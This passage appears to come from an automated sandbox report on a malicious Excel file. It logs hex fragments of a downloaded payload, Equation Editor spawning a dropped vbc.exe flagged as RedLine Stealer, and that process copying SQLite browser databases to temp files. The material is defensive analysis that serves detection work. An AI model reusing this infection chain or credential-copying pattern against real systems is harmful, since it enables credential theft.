2022-02-22 14:30:32 UTC 96 IN Data Raw: 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 37 1a 00 00 20 1a 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1a 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 d7 19 00 00 38 fe 0c 00 00 38 f9 0c 00 00 20 1c 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1c 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 6c 1a 00 00 38 d3 0c 00 00 38 ce 0c 00 00 20 2b 00 00 00 fe 0c 1c 00 3f 06 02 00 00 20 2b 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 b4 1f 00 00 20 24 00 00 00 fe 0c 1c 00 3f fc 00 00 00 20 24 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 18 1d 00 00 20 20 00 00 00 fe 0c 1c 00 3f 64 00 00 00 20 20 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 45 1b 00 00 20 1e 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1e 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 9e 1a 00 00 38 45 0c 00 00 20 1f 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 Data Ascii: =87 ? =888 ? =8l88 +? +=8 $? $=8 ?d =8E ? =88E ?

2022-02-22 14:30:32 UTC 100 IN Data Raw: 0e 0c 00 20 00 00 00 00 fe 0e 09 00 fe 0c 24 00 fe 0c 24 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0e 02 00 fe 0c 2d 00 fe 0c 21 00 fe 0c 10 00 a2 fe 0c 22 00 fe 0c 21 00 fe 0c 16 00 9e fe 0c 27 00 fe 0c 21 00 20 00 00 00 00 9e fe 0c 21 00 20 01 00 00 00 58 fe 0e 21 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 10 00 7a 00 00 dd af ea ff ff fe 0c 24 00 fe 0c 02 00 fe 0c 03 00 58 4a 58 fe 0e 02 00 dd 97 ea ff ff 00 dd 91 ea ff ff fe 0c 05 00 fe 0c 09 00 8f 04 00 00 01 e0 fe 0c 02 00 fe 0c 03 00 58 4a 54 fe 0c 0f 00 fe 0c 09 00 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 49 ea ff ff fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 Data Ascii: $$X XXJX-!"!'! ! X!8 z$XJXXJT X XI Y Y

2022-02-22 14:30:32 UTC 104 IN Data Raw: fe 0c 0b 00 fe 0c 02 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 15 00 fe 0c 09 00 14 a2 fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 65 da ff ff fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 02 00 fe 0c 03 00 58 4a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0c 24 00 58 fe 0e 02 00 fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 dd 00 da ff ff fe 0c 0f 00 fe 0c 09 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a 74 Data Ascii: XJGT X Xe YJ XJ XXJYZ XXJX$X Y Y Y Yt Yt Yt

2022-02-22 14:30:32 UTC 108 IN Data Raw: 01 e0 fe 0c 15 00 fe 0c 09 00 20 06 00 00 00 59 9a 74 11 00 00 02 fe 0c 05 00 fe 0c 09 00 20 05 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 05 00 fe 0c 09 00 20 04 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 11 00 00 1b fe 0c 05 00 fe 0c 09 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 1a 00 fe 0c 0b 00 fe 0c 13 00 7e 30 00 00 04 fe 0c 29 00 fe 0c 09 00 20 01 00 00 00 59 94 97 29 82 00 00 11 7e 30 00 00 04 fe 0c 02 00 fe 0c 03 00 58 4a 97 29 86 00 00 11 54 fe 0c 09 00 20 05 00 00 00 59 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 36 c9 ff ff fe 0c 0f 00 fe 0c 09 00 20 02 00 00 00 59 20 00 00 00 00 9c fe Data Ascii: Yt YM YJ Yt YJ Y YJ~0) Y)~0XJ)T Y X6 Y

2022-02-22 14:30:32 UTC 112 IN Data Raw: 0e 0c 00 fe 0c 0d 00 fe 0c 0c 00 58 20 02 00 00 00 5b fe 0e 16 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 fe 0c 03 00 58 4a fe 0e 19 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 03 00 58 4a fe 0e 01 00 fe 0c 11 00 fe 0c 19 00 fe 0c 01 00 58 3c 16 00 00 00 fe 0c 19 00 fe 0c 11 00 3d 1c 00 00 00 fe 0c 16 00 38 26 00 00 00 fe 0c 16 00 20 01 00 00 00 58 fe 0e 0d 00 38 6e ff ff ff fe 0c 16 00 20 01 00 00 00 59 fe 0e 0c 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 03 00 58 4a fe 0e 20 00 fe 0c 20 00 fe 0e 17 00 20 ff ff ff ff fe 0c 17 00 40 0e 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 06 00 7a 00 fe 0c 24 00 fe 0c 17 00 Data Ascii: X [$ 5 X ZXXJ$ 5 X ZX XXJX<=8& X8n Y8[$ 5 X ZX XXJ @ z$

2022-02-22 14:30:32 UTC 116 IN Data Raw: 00 00 00 fe 06 a4 00 00 06 9b 7e 2b 00 00 04 20 01 00 00 00 fe 06 a5 00 00 06 9b 7e 2b 00 00 04 20 02 00 00 00 fe 06 a6 00 00 06 9b 7e 2b 00 00 04 20 03 00 00 00 fe 06 a7 00 00 06 9b 7e 2b 00 00 04 20 04 00 00 00 fe 06 a8 00 00 06 9b 7e 2b 00 00 04 20 05 00 00 00 fe 06 a9 00 00 06 9b 7e 2b 00 00 04 20 06 00 00 00 fe 06 aa 00 00 06 9b 7e 2b 00 00 04 20 07 00 00 00 fe 06 ab 00 00 06 9b 7e 2b 00 00 04 20 08 00 00 00 fe 06 ac 00 00 06 9b 7e 2b 00 00 04 20 09 00 00 00 fe 06 ad 00 00 06 9b 7e 2b 00 00 04 20 0a 00 00 00 fe 06 ae 00 00 06 9b 7e 2b 00 00 04 20 0b 00 00 00 fe 06 af 00 00 06 9b 7e 2b 00 00 04 20 0c 00 00 00 fe 06 b0 00 00 06 9b 7e 2b 00 00 04 20 0d 00 00 00 fe 06 b1 00 00 06 9b 7e 2b 00 00 04 20 0e 00 00 00 fe 06 b2 00 00 06 9b 2a 5a fe 09 00 00 fe Data Ascii: ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ *Z


Timestamp kBytes transferred Direction Data

Copyright Joe Security LLC 2022 Page 44 of 65




Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596

General

Target ID: 0

Start time: 15:29:22

Start date: 22/02/2022

Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Wow64 process (32bit): false

Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

Imagebase: 0x13f5c0000

File size: 28253536 bytes

MD5 hash: D53B85E21886D2AF9815C377537BCAC3

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: high

File Activities

Registry Activities

Key Created

Key Path Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems success or wait 1 6DDF0648 unknown

Key Value Created

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems +3- binary 2B 33 2D 00 14 0A 00 00 02 00 00 00 00 00 00 00 46 00 00 00 01 00 00 00 22 00 00 00 18 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 2E 00 78 00 6C 00 73 00 78 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 00 00 success or wait 1 6DDF0648 unknown

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596

General

Target ID: 2

Start time: 15:29:47

Start date: 22/02/2022

Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Wow64 process (32bit): true

Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Imagebase: 0x400000

File size: 543304 bytes

MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8

Has elevated privileges: true

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: high

File Activities

File Path Access Attributes Options Completion Count Source Address Symbol

File Path Offset Length Value Ascii Completion Count Source Address Symbol

File Path Offset Length Completion Count Source Address Symbol

Registry Activities

Key Created

Key Path Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Equation Editor success or wait 1 41369F RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0 success or wait 1 41369F RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options success or wait 1 41369F RegCreateKeyExA

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Analysis Process: vbc.exe PID: 1828, Parent PID: 2664

General

Target ID: 4

Start time: 15:29:50

Start date: 22/02/2022

Path: C:\Users\Public\vbc.exe

Wow64 process (32bit): true

Commandline: "C:\Users\Public\vbc.exe"

Imagebase: 0xf00000

File size: 14336 bytes

MD5 hash: 980EC4304344F277D722024ADE08CD01

Has elevated privileges: true

Has administrator privileges: true

Programmed in: .Net C# or VB.NET

Yara matches:

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Antivirus matches: Detection: 7%, ReversingLabs

Reputation: low

File Activities

File Read

File Path Offset Length Completion Count Source Address Symbol

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6D517995 unknown

C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux unknown 176 success or wait 1 6D42DE2C ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux unknown 1720 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux unknown 620 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux unknown 584 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux unknown 864 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux unknown 900 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux unknown 748 success or wait 1 6D42DE2C ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll.aux unknown 1708 success or wait 1 6D42DE2C ReadFile

Registry Activities

Key Created

Key Path Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 success or wait 1 6B92AD76 unknown

Key Value Created

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 EnableFileTracing dword 0 success or wait 1 6B92AD76 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 EnableConsoleTracing dword 0 success or wait 1 6B92AD76 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 FileTracingMask dword -65536 success or wait 1 6B92AD76 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 ConsoleTracingMask dword -65536 success or wait 1 6B92AD76 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 MaxFileSize dword 1048576 success or wait 1 6B92AD76 unknown

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 FileDirectory expand unicode %windir%\tracing success or wait 1 6B92AD76 unknown

Key Path Name Type Old Data New Data Completion Count Source Address Symbol

Analysis Process: vbc.exe PID: 2844, Parent PID: 1828

General

Target ID: 5

Start time: 15:29:57

Start date: 22/02/2022

Path: C:\Users\Public\vbc.exe

Wow64 process (32bit): true

Commandline: C:\Users\Public\vbc.exe

Imagebase: 0xf00000

File size: 14336 bytes

MD5 hash: 980EC4304344F277D722024ADE08CD01

Has elevated privileges: true

Has administrator privileges: true

Programmed in: .Net C# or VB.NET

Yara matches:

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Reputation: low

File Activities

File Created

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Temp\tmp6222.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp6417.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp67A3.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp6C85.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7108.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp71C5.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp72BF.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp738B.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7486.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7551.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp764C.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7718.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7841.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp790D.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp533A.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Yandex read data or list directory | synchronize

device | sparse file

directory file | synchronous io non alert | open for backup ident | open reparse point

success or wait 1 6C514247 CreateDirectoryW

C:\Users\user\AppData\Local\Yandex\YaAddon read data or list directory | synchronize

device | sparse file

directory file | synchronous io non alert | open for backup ident | open reparse point

success or wait 1 6C514247 CreateDirectoryW

File Deleted

File Path Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6222.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6417.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp67A3.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6C85.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp71C5.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7108.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp738B.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp72BF.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7551.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7486.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7718.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp764C.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp790D.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7841.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp533A.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp success or wait 1 6C517D79 DeleteFileW

File Path Completion Count Source Address Symbol

File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Temp\tmp6222.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW

File Written

Copyright Joe Security LLC 2022 Page 51 of 65

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp6417.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp64E3.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp67A3.tmp

0 40960

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp

0 28672

SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp6C85.tmp

0 28672

SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp7108.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp71C5.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp72BF.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp738B.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp7486.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp7551.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp764C.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp7718.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp7841.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp790D.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp

0 65536

SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp

0 65536

SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp

0 65536

SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp533A.tmp

0 1026

AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL

success or wait 1 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp3E26.tmp

0 1026

